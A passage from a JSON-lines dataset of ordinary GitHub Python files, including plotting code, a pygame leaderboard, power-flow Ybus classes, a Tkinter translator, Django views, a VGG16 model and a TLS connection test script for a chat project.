ax.set_title(f\"Q value training loss (Smoothed)\")\n\n ax = plt.subplot(5, 1, 4)\n columns_grad_critic = _select_grad_cols(df_gradients_critic.columns)\n for col in columns_grad_critic:\n ax.plot(df_gradients_critic[\"step\"], np.log(1 + df_gradients_critic[col]))\n ax.set_title(f\"Critic gradients (Log Y-axis)\")\n ax.legend(columns_grad_critic)\n\n ax = plt.subplot(5, 1, 5)\n ax.plot(df_critic_training_info[\"step\"], df_critic_training_info[\"estimated_target\"], 
color=\"b\")\n ax.plot(df_critic_training_info[\"step\"], df_critic_training_info[\"estimated_value\"], color=\"orange\")\n ax.plot(df_critic_training_info[\"step\"], df_critic_training_info[\"immediate_reward\"], color=\"green\")\n ax.plot(df_critic_training_info[\"step\"], df_critic_training_info[\"discounted_n_steps_return\"], \"--\", color=\"grey\",\n alpha=0.2)\n ax.plot(df_critic_training_info_smoothed[\"step\"], df_critic_training_info_smoothed[\"discounted_n_steps_return\"],\n \"--\", color=\"purple\")\n ax.legend([\n \"Estimated target\",\n \"Estimated Q-value\",\n \"Immediate Reward\",\n f\"Discounted return ({n_steps_return} steps)\",\n f\"Discounted return ({n_steps_return} steps, Smoothed)\",\n ])\n\n\ndef plot_coma_actors_critic(\n experiment_name: str,\n n_agents: int,\n samples_critic: int = 100,\n plot_individual_actors: bool = False,\n first_time_step: int = 0,\n frame_length: int = 1,\n y_max_actor: float = 1\n):\n n_cols = frame_length\n n_rows = n_agents + 2 if plot_individual_actors else 2\n\n plt.figure(figsize=(7 * n_cols, 5 * n_rows))\n\n for slot in range(frame_length):\n p_aloha = 1 / n_agents\n\n df_coma_general = get_coma_info(\n experiment_name, samples_critic=samples_critic, time_step=(first_time_step + slot)\n )\n\n ax = plt.subplot(n_rows, n_cols, slot + 1)\n plot_p_transmit_aac(ax, df_aac=df_coma_general, y_max=y_max_actor, p_aloha=p_aloha)\n ax.set_title(f\"Policies average transmission probability slot {slot+1}\")\n\n ax = plt.subplot(n_rows, n_cols, n_cols + slot + 1)\n plot_critic_value_aac(ax, df_aac=df_coma_general)\n ax.set_title(f\"Critic value function slot {slot+1}\")\n\n if plot_individual_actors:\n df_list_coma_actors = get_coma_actors_info(experiment_name, time_step=(first_time_step + slot))\n for idx_actor, df_actor in enumerate(df_list_coma_actors):\n ax = plt.subplot(n_rows, n_cols, (idx_actor + 2) * n_cols + slot + 1)\n plot_p_transmit_aac(ax, df_aac=df_actor, y_max=y_max_actor, p_aloha=p_aloha)\n ax.set_title(f\"Actor {idx_actor} transmission probability slot {slot+1}\")\n\n\ndef plot_tdma_actors_intermediary_probabilities(\n experiment_name: str,\n n_agents: int,\n y_max_actor: float = 1,\n first_time_step: int = 0,\n frame_length: int = 1\n):\n n_cols = 1 + frame_length\n n_rows = n_agents\n plt.figure(figsize=(6 * n_cols, 5 * n_rows))\n\n # Plot slot agnostic transmission probabilities\n df_list_coma_actors = get_coma_actors_info(experiment_name, time_step=first_time_step, is_tdma_actor=True)\n for idx_actor, df_actor in enumerate(df_list_coma_actors):\n ax = plt.subplot(n_rows, n_cols, n_cols * idx_actor + 1)\n plot_p_transmit_aac(\n ax,\n df_aac=df_actor,\n y_max=y_max_actor,\n p_aloha=None,\n p_column=\"slot_agnostic_p_transmit\",\n y_label=\"Slot agnostic p_transmit\"\n )\n ax.set_title(f\"Actor {idx_actor + 1} slot agnostic transmission probability\")\n\n for slot in range(frame_length):\n df_list_coma_actors = get_coma_actors_info(\n experiment_name, time_step=first_time_step + slot, is_tdma_actor=True\n )\n\n # Mean ALOHA per slot\n n_packets_max = df_list_coma_actors[0][\"n_packets_buffer\"].max()\n expected_number_of_agents_in_slot = np.array([0.0] * (n_packets_max+1))\n for df in df_list_coma_actors:\n expected_number_of_agents_in_slot += df.groupby(\n \"n_packets_buffer\", as_index=False\n ).agg({\n \"p_slot\": \"mean\"\n }).sort_values(\n \"n_packets_buffer\"\n )[\"p_slot\"].values\n slot_occupation_dependent_p_aloha = [1/n for n in expected_number_of_agents_in_slot]\n\n # Plot slot selection\n for idx_actor, df_actor in 
enumerate(df_list_coma_actors):\n ax = plt.subplot(n_rows, n_cols, n_cols * idx_actor + slot + 2)\n plot_p_transmit_aac(\n ax,\n df_aac=df_actor,\n y_max=y_max_actor,\n p_aloha=slot_occupation_dependent_p_aloha,\n p_column=\"p_slot\",\n y_label=f\"Probability of selecting slot {slot+1}\"\n )\n ax.set_title(f\"Actor {idx_actor + 1} slot num. {slot+1} probability\")\n","repo_name":"kclip/bayesian-dt","sub_path":"src/view/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":28030,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"17500356679","text":"import time\n\nfrom game.environment import GameEnvironment\nfrom game.handlers.leaderboard import LeaderBoardHandler\nfrom game.sprites.text import Text\nfrom pygame.surface import Surface\n\n\nclass LeaderBoardText(Text):\n \"\"\" LeaderBoardText class extended from Text class.\n It creates the the leaderboard table sprite\n \"\"\"\n def __init__(self):\n Text.__init__(self, size=22)\n game_env = GameEnvironment()\n name_length = game_env.static.name_length * 2\n leaders = LeaderBoardHandler().load()\n seperator = self.font.render('===================================================================================================', 1, self.color)\n header = self.font.render('=== HALL OF FAME ===', 1, self.color)\n all_surfaces = []\n all_surfaces.append(seperator)\n all_surfaces.append(self.font.render(f\"{'RANK'.ljust(5)} {'NAME'.ljust(name_length)} {'SCORE'.ljust(10)} {'LEVEL'.ljust(5)} {'ACCURACY'.ljust(8)} {'TIME'.rjust(21)}\", 1, self.color))\n all_surfaces.append(seperator)\n try:\n if len(leaders) == 0:\n all_surfaces.append(self.font.render('No records, make sure you have working internet connectivity', 1, self.color))\n\n for index, score in enumerate(leaders['scores']):\n all_surfaces.append(self.font.render(f\"{str(index+1).ljust(5)} {score['name'][:name_length].ljust(name_length)} {str(score['score']).ljust(10)} {str(score['level']).ljust(5)} {str(score['accuracy'] + '%').ljust(8)} {str(time.ctime(int(score['epoch']))).rjust(25)}\", 1, self.color))\n except Exception:\n pass\n all_surfaces.append(seperator)\n\n self.surf = Surface((all_surfaces[2].get_width(), all_surfaces[0].get_height() * (len(all_surfaces) + 1)), game_env.SRCALPHA)\n\n self.surf.blit(header, (self.surf.get_width() / 2 - header.get_width() / 2, 0))\n for index, temp_surf in enumerate(all_surfaces):\n self.surf.blit(temp_surf, (0, header.get_height() + index * temp_surf.get_height()))\n\n self.rect = self.surf.get_rect(center=(game_env.static.screen_width / 2, game_env.static.screen_height / 2))\n","repo_name":"ljnath/PyBluesky-android","sub_path":"game/sprites/text/leaderboard.py","file_name":"leaderboard.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"51090499563","text":"'''\nThis use case action handles the poll creation in all its forms, if something\ngoes wrong with this operation will throw a domain exception explaining why\n'''\nfrom datetime import datetime\nimport public # type: ignore\nfrom core import entities # pylint: disable=unused-import\nfrom core.payloads.poll_payload import PollPayload\n\n@public.add\ndef new_poll(payload: PollPayload) -> 'entities.Poll': # type: ignore\n '''\n Build and persist a instance of a Poll object on every way posible. 
Thats\n its the SRP of this action the only reason for this function will be edited\n its that we find a new way of make a Poll object\n '''\n\n assert payload.expires_at() > datetime.now()\n assert payload.questions()\n\n if payload.poll():\n # pylint: disable=no-member\n return entities.Poll( # type: ignore\n parent=payload.poll(),\n expires_at=payload.expires_at(),\n questions=payload.questions()\n )\n\n # pylint: disable=no-member\n return entities.Poll( # type: ignore\n expires_at=payload.expires_at(),\n questions=payload.questions()\n )\n","repo_name":"ricardosiri68/justask","sub_path":"core/actions/new_poll.py","file_name":"new_poll.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"34174340582","text":"import asyncio\nimport functools\nimport shlex\nfrom typing import Tuple\n\nfrom ...core.logger import logging\n\nLOGS = logging.getLogger(__name__)\n\n\nasync def bash(cmd):\n process = await asyncio.create_subprocess_shell(\n cmd,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE,\n )\n stdout, stderr = await process.communicate()\n err = stderr.decode().strip()\n out = stdout.decode().strip()\n return out, err\n\n\n# executing of terminal commands\nasync def runcmd(cmd: str) -> Tuple[str, str, int, int]:\n args = shlex.split(cmd)\n process = await asyncio.create_subprocess_exec(\n *args, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE\n )\n stdout, stderr = await process.communicate()\n return (\n stdout.decode(\"utf-8\", \"replace\").strip(),\n stderr.decode(\"utf-8\", \"replace\").strip(),\n process.returncode,\n process.pid,\n )\n\n\ndef run_sync(func, *args, **kwargs):\n return asyncio.get_event_loop().run_in_executor(\n None, functools.partial(func, *args, **kwargs)\n )\n\n\ndef run_async(loop, coro):\n return asyncio.run_coroutine_threadsafe(coro, loop).result()\n\n\ndef runasync(func: callable):\n \"\"\"Run async functions with the right event loop.\"\"\"\n loop = asyncio.get_event_loop()\n return loop.run_until_complete(func)\n","repo_name":"thejmthon/jmjoz","sub_path":"jmisbest/helpers/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"79"} +{"seq_id":"2244258469","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nfrom tensorflow.contrib.slim import losses\nfrom tensorflow.contrib.slim import arg_scope\nimport numpy as np\n\nnum_classes = 21\n\ndef vgg16(images, batch_size, ACT=False, is_training=True,\n filter_num = [64,64,128,128,256,256,256,512,512,512,512,512,512]):\n act_summaries = []\n with tf.variable_scope('vgg_16', 'vgg_16',\n regularizer=tf.contrib.layers.l2_regularizer(0.5)): # 0.0005\n initializer = tf.random_normal_initializer(mean=0.0, stddev=0.01)\n with tf.variable_scope('conv1'):\n net = slim.conv2d(images, filter_num[0],\n [3, 3], trainable=False, scope='conv1_1') # 64\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[1],\n [3, 3], trainable=False, scope='conv1_2') # 64\n act_summaries.append(net)\n net = slim.max_pool2d(net, [2,2], padding = 'SAME', scope='pool1')\n with tf.variable_scope('conv2'):\n net = slim.conv2d(net, filter_num[2],\n [3, 3], trainable = False, scope='conv2_1') # 128\n act_summaries.append(net)\n net = slim.conv2d(net, 
filter_num[3],\n [3, 3], trainable = False, scope='conv2_2') # 128\n act_summaries.append(net)\n net = slim.max_pool2d(net, [2,2], padding = 'SAME', scope = 'pool2')\n with tf.variable_scope('conv3'):\n net = slim.conv2d(net, filter_num[4],\n [3, 3], trainable = False, scope='conv3_1') # 256\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[5],\n [3, 3], trainable = False, scope='conv3_2') # 256\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[6],\n [3, 3], trainable = False, scope='conv3_3') # 256\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[5],\n [3, 3], trainable = False, scope='conv3_2') # 256\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[6],\n [3, 3], trainable = False, scope='conv3_3') # 256\n act_summaries.append(net)\n net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool3')\n with tf.variable_scope('conv4'):\n net = slim.conv2d(net, filter_num[7],\n [3, 3], trainable = False, scope='conv4_1') # 512\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[8],\n [3, 3], trainable = False, scope='conv4_2') # 512\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[9],\n [3, 3], trainable = False, scope='conv4_3') # 512\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[8],\n [3, 3], trainable = False, scope='conv4_2') # 512\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[9],\n [3, 3], trainable = False, scope='conv4_3') # 512\n act_summaries.append(net)\n net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool4')\n with tf.variable_scope('conv5'):\n net = slim.conv2d(net, filter_num[10],\n [3, 3], trainable = False, scope='conv5_1') # 512\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[11],\n [3, 3], trainable = False, scope='conv5_2') # 512\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[12],\n [3, 3], trainable = False, scope='conv5_3') # 512\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[11],\n [3, 3], trainable = False, scope='conv5_2') # 512\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[12],\n [3, 3], trainable = False, scope='conv5_3') # 512\n act_summaries.append(net)\n net = slim.max_pool2d(net, [2,2], padding='SAME', scope='pool5')\n [a,b,c,d] = net.get_shape().as_list()\n pool5_flat = slim.flatten(net, [batch_size,b*c*d], scope='flatten')\n fc6 = slim.fully_connected(pool5_flat,4096,trainable=is_training,scope='fc6')\n if is_training:\n fc6 = slim.dropout(fc6, scope='dropout6')\n fc7 = slim.fully_connected(fc6,4096,trainable=is_training,scope='fc7')\n if is_training:\n fc7 = slim.dropout(fc7, scope='dropout7')\n cls_score = slim.fully_connected(fc7, num_classes,\n weights_initializer=initializer,\n trainable=is_training,\n activation_fn=None, scope='cls_score')\n cls_prob = tf.nn.softmax(cls_score, name=\"cls_prob\")\n\n\n # predictions[\"cls_score\"] = cls_score\n # predictions[\"cls_prob\"] = cls_prob\n # score_summaries.update(predictions)\n\n if ACT:\n return cls_score, cls_prob, act_summaries\n return cls_score, cls_prob\n","repo_name":"shuang1330/tf_vgg16_voc","sub_path":"lib/nets/vgg16.py","file_name":"vgg16.py","file_ext":"py","file_size_in_byte":5176,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"13451223415","text":"from datetime import datetime, time, timedelta, date\nimport pytz\n\n\nMONDAY = 0\n\n\ndef to_datetime(a_date):\n return datetime.combine(a_date, time(0)).replace(tzinfo=pytz.UTC)\n\n\ndef 
to_date(a_datetime):\n if a_datetime is None:\n return None\n elif isinstance(a_datetime, datetime):\n return a_datetime.date()\n elif isinstance(a_datetime, date):\n return a_datetime\n else:\n raise ValueError(\"{0!r} ({1}) isn't a date or datetime\"\n .format(a_datetime, type(a_datetime)))\n\n\ndef to_utc(a_datetime):\n return a_datetime.astimezone(pytz.UTC)\n\n\ndef period_range(start_date, end_date):\n start_date = to_date(start_date) or a_week_ago()\n end_date = to_date(end_date) or a_week_ago()\n\n if start_date > end_date:\n raise ValueError(\"Bad period: !(start_date={0} <= end_date={1})\"\n .format(start_date, end_date))\n\n if start_date.weekday != MONDAY:\n start_date = start_date - timedelta(days=start_date.weekday())\n\n period = timedelta(days=7)\n while start_date <= end_date:\n yield (start_date, start_date + timedelta(days=6))\n start_date += period\n\n\ndef a_week_ago():\n return date.today() - timedelta(days=7)\n","repo_name":"alphagov/backdrop-ga-collector","sub_path":"collector/datetimeutil.py","file_name":"datetimeutil.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"70128954177","text":"'''\n=> Script para fazer teste de conexão individual. Client_number é o o id do Telegram do \"atacante\".\n'''\n\nimport socket, ssl, sys\nimport time\nclient_number = \"id_do_telegram_do_atacante\";\nCERT_AU = \"ca_bundle.pem\"\nCERT_1 = f\"{client_number}_crt.pem\";\nKEY = f\"{client_number}.pem\";\nseparador = \":*!$+\";\nsock = socket.socket(socket.AF_INET);\ncontext = ssl.create_default_context(ssl.Purpose.SERVER_AUTH);\ncontext.set_ciphers('EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH')\ncontext.check_hostname = False;\ncontext.load_cert_chain(certfile=CERT_1, keyfile=KEY)\ncontext.load_verify_locations(cafile=CERT_AU);\nconn = context.wrap_socket(sock);\n\nconn.connect(('IP_do_alvo_do_teste', 50052));\nresposta = conn.recv();\nresposta = resposta.decode('UTF-8');\nif resposta == \"???\":\n conn.write(bytes(sys.argv[1],\"utf-8\"));\n resposta = conn.recv();\n conn.close();\n","repo_name":"joaopedrolourencoaffonso/Chimera-chat","sub_path":"scripts_para_testes/teste_conexao_SSL.py","file_name":"teste_conexao_SSL.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"1442173101","text":"from datetime import datetime, timedelta\r\nfrom unittest import TestCase\r\n\r\nimport pytest\r\n\r\nfrom core.services.channel_update import AverageCalculator, average\r\n\r\n\r\nclass TestAverageCalculator(TestCase):\r\n def test_push_value_should_store_the_value(self):\r\n calculator = AverageCalculator(period=60, start_at=datetime.now())\r\n calculator.push_value(1, datetime.now())\r\n assert calculator.values == [1]\r\n\r\n def test_push_value_should_clear_values_when_period_elapsed(self):\r\n calculator = AverageCalculator(period=60, start_at=datetime.now())\r\n calculator.push_value(2, datetime.now())\r\n calculator.push_value(1, datetime.now() + timedelta(seconds=61))\r\n assert calculator.values == [1]\r\n\r\n def test_has_average_should_return_false_when_period_didnt_elapse(self):\r\n calculator = AverageCalculator(period=60, start_at=datetime.now())\r\n calculator.push_value(1, datetime.now())\r\n assert calculator.has_average is False\r\n\r\n def test_has_average_should_return_true_when_period_elapsed(self):\r\n calculator = AverageCalculator(period=60, 
start_at=datetime.now())\r\n calculator.push_value(2, datetime.now())\r\n calculator.push_value(1, datetime.now() + timedelta(seconds=61))\r\n assert calculator.has_average is True\r\n\r\n def test_pop_average_should_return_average(self):\r\n calculator = AverageCalculator(period=60, start_at=datetime.now())\r\n calculator.push_value(2, datetime.now())\r\n calculator.push_value(1, datetime.now() + timedelta(seconds=61))\r\n value, _ = calculator.pop_average()\r\n assert value == 2\r\n\r\n def test_pop_average_should_return_timestamp_in_the_middle_of_period(self):\r\n now = datetime(2017, 2, 2, 10, 0, 10)\r\n calculator = AverageCalculator(period=60, start_at=now)\r\n calculator.push_value(2, now + timedelta(seconds=20))\r\n calculator.push_value(10, now + timedelta(seconds=70))\r\n _, actual = calculator.pop_average()\r\n expected = now + timedelta(seconds=30)\r\n assert actual == expected\r\n\r\n def test_calculator_should_work_for_multiple_periods(self):\r\n now = datetime(2017, 2, 2, 10, 0, 10)\r\n calculator = AverageCalculator(period=60, start_at=now)\r\n calculator.push_value(2, now + timedelta(seconds=20))\r\n calculator.push_value(10, now + timedelta(seconds=70))\r\n calculator.push_value(15, now + timedelta(seconds=75))\r\n calculator.push_value(20, now + timedelta(seconds=127))\r\n actual = calculator.pop_average()\r\n expected = (12.5, now + timedelta(seconds=90))\r\n assert actual == expected\r\n\r\n def test_pop_average_should_raise_exception_when_no_average_to_pop(self):\r\n now = datetime(2017, 2, 2, 10, 0, 10)\r\n calculator = AverageCalculator(period=60, start_at=now)\r\n with pytest.raises(RuntimeError):\r\n calculator.pop_average()\r\n\r\n\r\ndef test_average_should_return_none_for_empty_list():\r\n assert average([]) is None\r\n\r\n\r\ndef test_average_should_return_valid_average_of_numbers():\r\n assert average([3, 1, 2]) == 2\r\n\r\n\r\ndef test_average_should_drop_minimal_and_maximal_value_when_there_is_more_than_four_values():\r\n assert average([0, 2, 3, 4, 1000]) == 3\r\n\r\n","repo_name":"darksv/dashboard","sub_path":"app/core/services/test_channel_update.py","file_name":"test_channel_update.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12278052550","text":"from BasicModule.Mode import*\nfrom UserDefinedModule.PowerFlow import*\n\nclass YtoYbus(threePhaseData_original):\n\n \n#==============================================================================\n# def setInit(self): # 2\n# par = []\n# par.append(['Y12', None])\n# par.append(['Y23', None])\n# par.append(['Y13', None])\n# par.append(['Ybus', None])\n# self.setInitValue(par)\n#==============================================================================\n \n \n def do(self):\n self.copyValue()\n self.CalYbus()\n print('Ybus',self.Ybus)\n \n def CalYbus(self):\n \n self.Y12 = self.lastMode.Llist[0]\n self.Y23 = self.lastMode.Llist[1]\n self.Y13 = self.lastMode.Llist[2]\n \n self.Y11 = (self.Y12+self.Y13)\n self.Y22 = (self.Y12+self.Y23)\n self.Y33 = (self.Y13+self.Y23)\n self.Ybus=[[self.Y11,-1*self.Y12,-1*self.Y13],[-1*self.Y12,self.Y22,-1*self.Y23],[-1*self.Y13,-1*self.Y23,self.Y33]]\n \n \n \nclass ZtoYbus(YtoYbus): # 1\n#==============================================================================\n# def setInit(self):\n# par = []\n# par.append(['Z12', None])\n# par.append(['Z23', None])\n# par.append(['Z13', None])\n# par.append(['Ybus', None])\n# self.setInitValue(par)\n# 
print(par)\n#==============================================================================\n def setintro(self):\n info = 'Calculate the Ybus Matrix.\\n'\n info = info + ' I Matrix * Ybus Matrix = V Matrix \\n' \n info = info + 'I1=(-1/Z12)*(V1-V2)+(-1/Z13)*(V1-V2)\\n'+'I2=(-1/Z12)*(V2-V1)+(-1/Z23)*(V2-V3)\\n'+'I3=(-1/Z13)*(V3-V1)+(-1/Z23)*(V3-V2)\\n'\n self.intro_str = info\n \n def do(self):\n self.copyValue()\n self.CalYbus()\n print('Ybus',self.Ybus)\n \n\n \n def CalYbus(self):\n \n self.Z12 = self.lastMode.Llist[0]\n self.Z23 = self.lastMode.Llist[1]\n self.Z13 = self.lastMode.Llist[2]\n \n self.Z11 = 1/(1/self.Z12+1/self.Z13)\n self.Z22 = 1/(1/self.Z12+1/self.Z23)\n self.Z33 = 1/(1/self.Z13+1/self.Z23)\n self.Ybus=[[1/self.Z11,-1/self.Z12,-1/self.Z13],[-1/self.Z12,1/self.Z22,-1/self.Z23],[-1/self.Z13,-1/self.Z23,1/self.Z33]]\n \n \n \n \n \nif __name__=='__main__':\n a = YtoYbus()\n a.do()\n print(a.AllVariables)\n print(a.getValue(a, 'Y12'))\n print(a.getValue(a, 'Y23'))\n print(a.getValue(a, 'Y13'))\n print(a.getValue(a, 'Ybus'))\n \n b = ZtoYbus()\n b.do()\n print(b.AllVariables)\n print(b.getValue(a, 'Z12'))\n print(b.getValue(a, 'Z23'))\n print(b.getValue(a, 'Z13'))\n print(b.getValue(a, 'Ybus'))\n \n\n\n","repo_name":"ncu-psl/MasonPy","sub_path":"MasonPy_System/MasonPy_DSL/UserDefinedModule/YbusMatrix.py","file_name":"YbusMatrix.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"70650493377","text":"from tkinter import*\nimport tkinter.ttk as exTk\nfrom PIL import Image, ImageTk\nimport googletrans\nfrom googletrans import Translator\n\nroot = Tk()\nroot.title('Google Galaxy')\nroot.geometry('500x630')\nroot.iconbitmap(\"logo.ico\")\n\nload = Image.open(\"background.png\")\nrender = ImageTk.PhotoImage(load)\nimg = Label(root, image=render)\nimg.place(x=0, y=0)\n\nname = Label(root, text=\"Translator\", fg=\"#FFFFFF\", bd=0, bg=\"#01142C\")\nname.config(font=(\"Transformers Movie\",30))\nname.pack(pady=10)\n\nkeys = list(googletrans.LANGUAGES.values())\nvalues = list(googletrans.LANGUAGES.keys())\nadict = dict(zip(keys, values))\n\ncombo = exTk.Combobox(root)\ncombo['value'] = tuple(keys)\ncombo.pack(pady=0)\n\nbox = Text(root, width=28, height=8, font=(\"ROBOTO\", 16))\nbox.pack(pady=10)\n\ncombo1 = exTk.Combobox(root)\ncombo1['value'] = tuple(keys)\ncombo1.place(x=180, y=360)\n\nbutton_frame = Frame(root).pack(side=BOTTOM)\n\ndef clear():\n box.delete(1.0, END)\n box1.delete(1.0, END)\ndef translate():\n box1.delete(1.0, END)\n INPUT = box.get(1.0, END)\n print(INPUT)\n t = Translator()\n a = t.translate(INPUT, src=adict[combo.get()], dest=adict[combo1.get()])\n b = a.text\n box1.insert(END, b)\n\nclear_button = Button(button_frame, text=\"Clear text\", font=((\"Arial\"),10,\"bold\"), bg=\"#303030\", fg=\"#FFFFFF\", command=clear)\nclear_button.place(x=150, y=320)\ntrans_button = Button(button_frame, text=\"Translate\", font=((\"Arial\"),10,\"bold\"), bg=\"#303030\", fg=\"#FFFFFF\", command=translate)\ntrans_button.place(x=290, y=320)\n\nbox1 = Text(root, width=28, height=8, font=(\"ROBOTO\", 16))\nbox1.place(x=80,y=390)\n\nroot.mainloop()\n","repo_name":"HOWRY02/Google_Translate","sub_path":"Translate.py","file_name":"Translate.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"4821684591","text":"# DO NOT modify this file by hand, changes will be overwritten\nfrom 
dataclasses import dataclass\n\nfrom cloudformation_cli_python_lib.interface import BaseModel\nfrom cloudformation_cli_python_lib.recast import recast_object\nfrom cloudformation_cli_python_lib.utils import deserialize_list\n\nimport sys\nfrom inspect import getmembers, isclass\nfrom typing import (\n AbstractSet,\n Any,\n Generic,\n Mapping,\n MutableMapping,\n Optional,\n Sequence,\n Type,\n TypeVar,\n)\n\nT = TypeVar(\"T\")\n\n\ndef set_or_none(value: Optional[Sequence[T]]) -> Optional[AbstractSet[T]]:\n if value:\n return set(value)\n return None\n\n\n@dataclass\nclass AwsSsmMaintenancewindowtarget(BaseModel):\n OwnerInformation: Optional[str]\n Description: Optional[str]\n WindowId: Optional[str]\n ResourceType: Optional[str]\n Targets: Optional[Sequence[\"_Targets\"]]\n Id: Optional[str]\n Name: Optional[str]\n\n @classmethod\n def _deserialize(\n cls: Type[\"_AwsSsmMaintenancewindowtarget\"],\n json_data: Optional[Mapping[str, Any]],\n ) -> Optional[\"_AwsSsmMaintenancewindowtarget\"]:\n if not json_data:\n return None\n dataclasses = {n: o for n, o in getmembers(sys.modules[__name__]) if isclass(o)}\n recast_object(cls, json_data, dataclasses)\n return cls(\n OwnerInformation=json_data.get(\"OwnerInformation\"),\n Description=json_data.get(\"Description\"),\n WindowId=json_data.get(\"WindowId\"),\n ResourceType=json_data.get(\"ResourceType\"),\n Targets=deserialize_list(json_data.get(\"Targets\"), Targets),\n Id=json_data.get(\"Id\"),\n Name=json_data.get(\"Name\"),\n )\n\n\n# work around possible type aliasing issues when variable has same name as a model\n_AwsSsmMaintenancewindowtarget = AwsSsmMaintenancewindowtarget\n\n\n@dataclass\nclass Targets(BaseModel):\n Values: Optional[Sequence[str]]\n Key: Optional[str]\n\n @classmethod\n def _deserialize(\n cls: Type[\"_Targets\"],\n json_data: Optional[Mapping[str, Any]],\n ) -> Optional[\"_Targets\"]:\n if not json_data:\n return None\n return cls(\n Values=json_data.get(\"Values\"),\n Key=json_data.get(\"Key\"),\n )\n\n\n# work around possible type aliasing issues when variable has same name as a model\n_Targets = Targets\n\n\n","repo_name":"aws-cloudformation/community-registry-extensions","sub_path":"hooks/Lambda_Invoker/src/awscommunity_lambda_invoker/target_models/aws_ssm_maintenancewindowtarget.py","file_name":"aws_ssm_maintenancewindowtarget.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"79"} +{"seq_id":"26620944319","text":"from django.shortcuts import render, redirect\nfrom . 
import models\nfrom movie.form import FormMovie\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.conf import settings\n\n# Create your views here.\n@login_required(login_url=settings.LOGIN_URL)\ndef tampilmovie(request):\n if request.POST:\n models.Movie.objects.all()\n \n tampilkan = models.Movie.objects.all()\n return render(request, 'indexmovie.html',\n\t\t{ 'data': tampilkan,\n\t\t})\n\ndef detailmovie(request, id):\n\tdetail_d = models.Movie.objects.filter(pk=id).first()\n\treturn render(request, 'detailmovie.html',\n\t\t{ 'data': detail_d,\n\t\t})\n\ndef tambahmovie(request, id):\n if request.POST:\n form = FormMovie(request.POST)\n if form.is_valid():\n form.save()\n form = FormMovie()\n pesan = 'Data Berhasil di Simpan'\n konteks = {\n 'form':form,\n 'pesan':pesan\n }\n return render(request, 'tambahmovie.html', konteks)\n else:\n form = FormMovie()\n konteks = {\n 'form':form,\n }\n return render(request, 'tambahmovie.html', konteks)\n\ndef editmovie(request, id_judul):\n juduls = models.Movie.objects.get(id=id_judul)\n template = 'editmovie.html'\n if request.POST:\n form = FormMovie(request.POST, instance=juduls)\n if form.is_valid():\n form.save()\n messages.success(request, 'Data Berhasil di Perbarui')\n return redirect('editmovie', id_judul=id_judul)\n else:\n form = FormMovie(instance=juduls)\n konteks = {\n 'form':form,\n 'juduls':juduls\n }\n return render(request, template, konteks)\n\ndef deletemovie(request, id):\n delete_d = models.Movie.objects.filter(pk=id).delete()\n return redirect('/movie')","repo_name":"adi-em/django","sub_path":"anime/project1/movie/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29878894785","text":"import json\nfrom os import path\nDB_FILE_PATH = '/home/himaet23/EwasteNonDestructiveDisassembly/src/CentralNode/src/storage/get_tool_schedule.json'\n\n\n\nclass ChangeToolScheduleDatabase(object):\n\n _instance = None\n def __new__(self):\n if not self._instance:\n self._instance = super(ChangeToolScheduleDatabase,self).__new__(self)\n self.config = {}\n return self._instance\n \n\n def readFromDB(self, key):\n self.checkFile()\n self.readFile()\n val = self.config[key]\n self.resetConfig()\n return val\n\n def readAllFromDB(self):\n self.checkFile()\n self.readFile()\n val = self.config\n self.resetConfig()\n return val\n\n\n def checkFile(self):\n if path.isfile(DB_FILE_PATH) is False:\n raise Exception(\"File not found\")\n \n def readFile(self):\n with open(DB_FILE_PATH) as db:\n self.config = json.load(db)\n\n def saveFile(self):\n with open(DB_FILE_PATH, 'w') as db:\n json.dump(self.config, db)\n\n def resetConfig(self):\n self.config = 